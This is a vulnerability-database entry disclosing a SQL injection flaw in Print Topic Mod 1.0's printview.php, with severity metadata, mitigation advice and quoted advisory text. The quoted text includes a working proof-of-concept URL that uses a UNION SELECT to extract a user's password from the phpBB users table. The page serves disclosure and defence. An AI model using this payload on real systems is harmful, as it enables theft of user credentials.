header-logo
Suggest Exploit
vendor:
Print Topic Mod
by:
Unknown
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Print Topic Mod
Affected Version From: Print Topic Mod version 1.0
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:print_topic_mod:print_topic_mod:1.0
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Remote SQL Injection vulnerability in Print Topic Mod

The 'printview.php' script in Print Topic Mod is vulnerable to remote SQL injection. This vulnerability occurs due to improper sanitization of user-supplied input before using it in an SQL query.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, keeping the software up-to-date with the latest security patches is advised.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10757/info

Print Topic Mod is reportedly affected by a remote SQL injection vulnerability in the 'printview.php' script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query.

Print Topic Mod version 1.0 is reported to be affected by this issue. 

http://www.example.com/printview.php?t={existing_topic's_id}&order_sql=UNION%20
SELECT%201%20,%20user_password%20,%201,%201,%201,%201,%201,%201,%201,%201,%201,
%201%20FROM%20{phpbb_users_table}%20WHERE%20user_id%20={some_user's_id}%20ORDER
%20BY%20t.topic_id%20ASC

Navigation

Suggest Exploit

Services By CQR